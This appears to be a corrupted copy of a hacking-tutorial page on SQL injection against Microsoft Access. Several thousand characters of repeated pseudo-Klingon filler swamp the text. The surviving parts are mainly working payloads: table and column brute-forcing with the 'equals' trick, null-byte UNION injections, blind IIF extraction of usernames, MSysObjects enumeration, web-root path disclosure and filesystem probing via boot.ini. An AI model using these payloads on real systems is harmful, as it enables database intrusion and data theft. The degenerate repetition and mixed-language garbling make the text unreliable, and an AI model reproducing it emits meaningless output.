vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh

'=(select+top+1+'lala'+from+<table_name>)='

bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bIQtIn 'e' vItlhutlh. bI

-1' AND (SELECT TOP 1 <table_name>)%00

ghItlhvam vItlhutlh.

Sqlmap common table names: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html vItlhutlh

Columns nametlh brute-Forcing

brute-Force current columns nametlh vItlhutlh chaining equals trick with:

'=column_name='

ghItlhvam:

SELECT column1, column2, ..., aggregate_function(column)
FROM table
WHERE condition
GROUP BY column1, column2, ...

ghItlhvam group by:

SELECT column1, column2, ..., aggregate_function(column)
FROM table
WHERE condition
GROUP BY column1, column2, ...

-1' GROUP BY column_name%00

Klingon Translation:

Or yu' can brute-force column names of a different table with:

'=(SELECT TOP 1 column_name FROM valid_table_name)='

-1' AND (SELECT TOP 1 column_name FROM valid_table_name)%00

qunwI'pu'

chaining equals technique to dump data from the current and other tables qaStaHvIS jatlh ghItlh 'ej latlh 'e' vItlhutlh. 'ach vItlhutlh qaStaHvIS jatlh ghItlh 'ej latlh 'e' vItlhutlh 'e' vItlhutlh qaStaHvIS jatlh ghItlh 'ej latlh 'e' vItlhutlh.

IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')

Time Based

Check https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN

Other Interesting functions

Mid('admin',1,1) get substring from position 1 length 1 (initial position is 1)
LEN('1234') get length of string
ASC('A') get ascii value of char
CHR(65) get string from ascii value
IIF(1=1,'a','b') if then
COUNT(*) Count number of items

Enumerating tables

From here you can see a query to get tables names:

select MSysObjects.name
from MSysObjects
where
MSysObjects.type In (1,4,6)
and MSysObjects.name not like '~*'
and MSysObjects.name not like 'MSys*'
order by MSysObjects.name

FileSystem access

Web Root Directory Full Path

web root absolute path may facilitate further attacks. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database.

http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00

MS Access responds with an error message containing the web directory full pathname.

File Enumeration

inferrer the existence of a file on the remote filesystem. If the specified file exists, MS Access triggers an error message informing that the database format is invalid:

http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\boot.ini'%00

specifying a database.table item. If the specified file exists, MS Access displays a database format error message.

http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\boot.ini.TableName%00

.mdb File Name Guessing

Database file name (.mdb) can be inferred with the following query:

http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00

name[i] is a .mdb filename and realTable is an existent table within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.

.mdb Password Cracker

Access PassView is a free utility that can be used to recover the main database password of Microsoft Access 95/97/2000/XP or Jet Database Engine 3.0/4.0.

References

http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!